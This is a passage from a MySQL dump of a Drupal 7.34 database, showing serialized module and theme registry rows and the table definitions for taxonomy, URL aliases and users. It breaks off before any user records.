administrators.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:6:{i:0;s:19:\"system.archiver.inc\";i:1;s:15:\"system.mail.inc\";i:2;s:16:\"system.queue.inc\";i:3;s:14:\"system.tar.inc\";i:4;s:18:\"system.updater.inc\";i:5;s:11:\"system.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:19:\"admin/config/system\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/system/tests/cron_queue_test.module','cron_queue_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"Cron Queue test\";s:11:\"description\";s:41:\"Support module for the cron queue runner.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/taxonomy/taxonomy.module','taxonomy','module','',1,0,7011,0,'a:15:{s:4:\"name\";s:8:\"Taxonomy\";s:11:\"description\";s:38:\"Enables the categorization of content.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:7:\"options\";}s:5:\"files\";a:2:{i:0;s:15:\"taxonomy.module\";i:1;s:13:\"taxonomy.test\";}s:9:\"configure\";s:24:\"admin/structure/taxonomy\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:8:\"required\";b:1;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}'),('modules/toolbar/toolbar.module','toolbar','module','',1,0,0,0,'a:12:{s:4:\"name\";s:7:\"Toolbar\";s:11:\"description\";s:99:\"Provides a toolbar that shows the top-level administration menu items and links from other modules.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/tracker/tracker.module','tracker','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:7:\"Tracker\";s:11:\"description\";s:45:\"Enables tracking of recent content for users.\";s:12:\"dependencies\";a:1:{i:0;s:7:\"comment\";}s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:12:\"tracker.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/translation/tests/translation_test.module','translation_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:24:\"Content Translation Test\";s:11:\"description\";s:49:\"Support module for the content translation tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/translation/translation.module','translation','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:19:\"Content translation\";s:11:\"description\";s:57:\"Allows content to be translated into different languages.\";s:12:\"dependencies\";a:1:{i:0;s:6:\"locale\";}s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:16:\"translation.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/trigger/tests/trigger_test.module','trigger_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:12:\"Trigger Test\";s:11:\"description\";s:33:\"Support module for Trigger tests.\";s:7:\"package\";s:7:\"Testing\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"version\";s:4:\"7.34\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/trigger/trigger.module','trigger','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:7:\"Trigger\";s:11:\"description\";s:90:\"Enables actions to be fired on certain system events, such as when new content is created.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:12:\"trigger.test\";}s:9:\"configure\";s:23:\"admin/structure/trigger\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/update/tests/aaa_update_test.module','aaa_update_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"AAA Update test\";s:11:\"description\";s:41:\"Support module for update module testing.\";s:7:\"package\";s:7:\"Testing\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"version\";s:4:\"7.34\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/update/tests/bbb_update_test.module','bbb_update_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"BBB Update test\";s:11:\"description\";s:41:\"Support module for update module testing.\";s:7:\"package\";s:7:\"Testing\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"version\";s:4:\"7.34\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/update/tests/ccc_update_test.module','ccc_update_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"CCC Update test\";s:11:\"description\";s:41:\"Support module for update module testing.\";s:7:\"package\";s:7:\"Testing\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"version\";s:4:\"7.34\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/update/tests/update_test.module','update_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Update test\";s:11:\"description\";s:41:\"Support module for update module testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/update/update.module','update','module','',1,0,7001,0,'a:13:{s:4:\"name\";s:14:\"Update manager\";s:11:\"description\";s:104:\"Checks for available updates, and can securely install or update modules and themes via a web interface.\";s:7:\"version\";s:4:\"7.34\";s:7:\"package\";s:4:\"Core\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"update.test\";}s:9:\"configure\";s:30:\"admin/reports/updates/settings\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/user/tests/user_form_test.module','user_form_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:22:\"User module form tests\";s:11:\"description\";s:37:\"Support module for user form testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/user/user.module','user','module','',1,0,7018,0,'a:15:{s:4:\"name\";s:4:\"User\";s:11:\"description\";s:47:\"Manages the user registration and login system.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:11:\"user.module\";i:1;s:9:\"user.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:19:\"admin/config/people\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"user.css\";s:21:\"modules/user/user.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('profiles/standard/standard.profile','standard','module','',1,0,0,1000,'a:15:{s:4:\"name\";s:8:\"Standard\";s:11:\"description\";s:51:\"Install with commonly used features pre-configured.\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:21:{i:0;s:5:\"block\";i:1;s:5:\"color\";i:2;s:7:\"comment\";i:3;s:10:\"contextual\";i:4;s:9:\"dashboard\";i:5;s:4:\"help\";i:6;s:5:\"image\";i:7;s:4:\"list\";i:8;s:4:\"menu\";i:9;s:6:\"number\";i:10;s:7:\"options\";i:11;s:4:\"path\";i:12;s:8:\"taxonomy\";i:13;s:5:\"dblog\";i:14;s:6:\"search\";i:15;s:8:\"shortcut\";i:16;s:7:\"toolbar\";i:17;s:7:\"overlay\";i:18;s:8:\"field_ui\";i:19;s:4:\"file\";i:20;s:3:\"rdf\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:7:\"package\";s:5:\"Other\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;s:6:\"hidden\";b:1;s:8:\"required\";b:1;s:17:\"distribution_name\";s:6:\"Drupal\";}'),('themes/bartik/bartik.info','bartik','theme','themes/engines/phptemplate/phptemplate.engine',1,0,-1,0,'a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}'),('themes/garland/garland.info','garland','theme','themes/engines/phptemplate/phptemplate.engine',0,0,-1,0,'a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}'),('themes/seven/seven.info','seven','theme','themes/engines/phptemplate/phptemplate.engine',1,0,-1,0,'a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}'),('themes/stark/stark.info','stark','theme','themes/engines/phptemplate/phptemplate.engine',0,0,-1,0,'a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}'); /*!40000 ALTER TABLE `dpl_system` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_taxonomy_index` -- DROP TABLE IF EXISTS `dpl_taxonomy_index`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_taxonomy_index` ( `nid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The dpl_node.nid this record tracks.', `tid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The term ID.', `sticky` tinyint(4) DEFAULT '0' COMMENT 'Boolean indicating whether the node is sticky.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when the node was created.', KEY `term_node` (`tid`,`sticky`,`created`), KEY `nid` (`nid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maintains denormalized information about node/term...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_taxonomy_index` -- LOCK TABLES `dpl_taxonomy_index` WRITE; /*!40000 ALTER TABLE `dpl_taxonomy_index` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_taxonomy_index` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_taxonomy_term_data` -- DROP TABLE IF EXISTS `dpl_taxonomy_term_data`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_taxonomy_term_data` ( `tid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique term ID.', `vid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The dpl_taxonomy_vocabulary.vid of the vocabulary to which the term is assigned.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The term name.', `description` longtext COMMENT 'A description of the term.', `format` varchar(255) DEFAULT NULL COMMENT 'The dpl_filter_format.format of the description.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The weight of this term in relation to other terms.', PRIMARY KEY (`tid`), KEY `taxonomy_tree` (`vid`,`weight`,`name`), KEY `vid_name` (`vid`,`name`), KEY `name` (`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores term information.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_taxonomy_term_data` -- LOCK TABLES `dpl_taxonomy_term_data` WRITE; /*!40000 ALTER TABLE `dpl_taxonomy_term_data` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_taxonomy_term_data` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_taxonomy_term_hierarchy` -- DROP TABLE IF EXISTS `dpl_taxonomy_term_hierarchy`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_taxonomy_term_hierarchy` ( `tid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Primary Key: The dpl_taxonomy_term_data.tid of the term.', `parent` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Primary Key: The dpl_taxonomy_term_data.tid of the term’s parent. 0 indicates no parent.', PRIMARY KEY (`tid`,`parent`), KEY `parent` (`parent`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores the hierarchical relationship between terms.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_taxonomy_term_hierarchy` -- LOCK TABLES `dpl_taxonomy_term_hierarchy` WRITE; /*!40000 ALTER TABLE `dpl_taxonomy_term_hierarchy` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_taxonomy_term_hierarchy` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_taxonomy_vocabulary` -- DROP TABLE IF EXISTS `dpl_taxonomy_vocabulary`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_taxonomy_vocabulary` ( `vid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique vocabulary ID.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'Name of the vocabulary.', `machine_name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The vocabulary machine name.', `description` longtext COMMENT 'Description of the vocabulary.', `hierarchy` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'The type of hierarchy allowed within the vocabulary. (0 = disabled, 1 = single, 2 = multiple)', `module` varchar(255) NOT NULL DEFAULT '' COMMENT 'The module which created the vocabulary.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The weight of this vocabulary in relation to other vocabularies.', PRIMARY KEY (`vid`), UNIQUE KEY `machine_name` (`machine_name`), KEY `list` (`weight`,`name`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='Stores vocabulary information.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_taxonomy_vocabulary` -- LOCK TABLES `dpl_taxonomy_vocabulary` WRITE; /*!40000 ALTER TABLE `dpl_taxonomy_vocabulary` DISABLE KEYS */; INSERT INTO `dpl_taxonomy_vocabulary` VALUES (1,'Tags','tags','Use tags to group articles on similar topics into categories.',0,'taxonomy',0); /*!40000 ALTER TABLE `dpl_taxonomy_vocabulary` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_url_alias` -- DROP TABLE IF EXISTS `dpl_url_alias`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_url_alias` ( `pid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'A unique path alias identifier.', `source` varchar(255) NOT NULL DEFAULT '' COMMENT 'The Drupal path this alias is for; e.g. node/12.', `alias` varchar(255) NOT NULL DEFAULT '' COMMENT 'The alias for this path; e.g. title-of-the-story.', `language` varchar(12) NOT NULL DEFAULT '' COMMENT 'The language this alias is for; if ’und’, the alias will be used for unknown languages. Each Drupal path can have an alias for each supported language.', PRIMARY KEY (`pid`), KEY `alias_language_pid` (`alias`,`language`,`pid`), KEY `source_language_pid` (`source`,`language`,`pid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='A list of URL aliases for Drupal paths; a user may visit...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_url_alias` -- LOCK TABLES `dpl_url_alias` WRITE; /*!40000 ALTER TABLE `dpl_url_alias` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_url_alias` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_users` -- DROP TABLE IF EXISTS `dpl_users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_users` ( `uid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Primary Key: Unique user ID.', `name` varchar(60) NOT NULL DEFAULT '' COMMENT 'Unique user name.', `pass` varchar(128) NOT NULL DEFAULT '' COMMENT 'User’s password (hashed).', `mail` varchar(254) DEFAULT '' COMMENT 'User’s e-mail address.', `theme` varchar(255) NOT NULL DEFAULT '' COMMENT 'User’s default theme.', `signature` varchar(255) NOT NULL DEFAULT '' COMMENT 'User’s signature.', `signature_format` varchar(255) DEFAULT NULL COMMENT 'The dpl_filter_format.format of the signature.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp for when user was created.', `access` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp for previous time user accessed the site.', `login` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp for user’s last login.', `status` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Whether the user is active(1) or blocked(0).', `timezone` varchar(32) DEFAULT NULL COMMENT 'User’s time zone.', `language` varchar(12) NOT NULL DEFAULT '' COMMENT 'User’s default language.', `picture` int(11) NOT NULL DEFAULT '0' COMMENT 'Foreign key: dpl_file_managed.fid of user’s picture.', `init` varchar(254) DEFAULT '' COMMENT 'E-mail address used for initial account creation.', `data` longblob COMMENT 'A serialized array of name value pairs that are related to the user. Any form values posted during user edit are stored and are loaded into the $user object during user_load(). Use of this field is discouraged and it will likely disappear in a future...', PRIMARY KEY (`uid`), UNIQUE KEY `name` (`name`), KEY `access` (`access`), KEY `created` (`created`), KEY `mail` (`mail`), KEY `picture` (`picture`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores user data.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_users` -- LOCK TABLES `dpl_users` WRITE; /*!40000 ALTER TABLE `dpl_users` DISABLE KEYS */; INSERT INTO `dpl_users` VALUES 